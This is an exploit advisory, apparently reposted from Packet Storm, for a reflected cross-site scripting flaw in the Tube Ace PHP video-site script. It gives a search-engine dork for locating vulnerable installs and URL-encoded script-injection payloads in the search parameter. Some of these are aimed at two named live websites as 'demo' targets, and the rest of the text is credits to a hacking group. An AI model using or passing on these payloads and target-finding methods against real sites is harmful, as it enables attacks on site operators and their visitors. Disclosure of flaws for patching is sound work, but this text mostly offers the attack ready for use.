Tube Ace, the adult PHP tube script, suffers from a cross site scripting vulnerability.
2010d2024561ad998b9a7e5c47a9b91e# Exploit Title: Tube Ace(Adult PHP Tube Script) XSS Vulnerability
# Date: 15/02/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software: Tube Ace
# http://www.tubeace.com
# Tested on: Linux
# Dork: "?viewStandard=0"
[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
Maximiliano Soler
Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion, ksha, zerial.
her0, r0dr1 y demas user de RemoteExecution
www.remoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group
[PoC]
http://localhost/mobile/search/?q=[XSS]
http://localhost/search/?q=%22%3E%3Cscript%3Ealert%28%22pwned%22%29%3C/script%3E&channel=
[DEMO]
http://www.tubeclipz.com/search/?q=%22%3E%3Cscript%3Ealert%28%22pwned%22%29%3C/script%3E&channel=
http://smoketube.tv/search/?q=%22%3E%3Cscript%3Ealert%28%22pwned%22%29%3C%2Fscript%3E&channel=
-------------------------
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!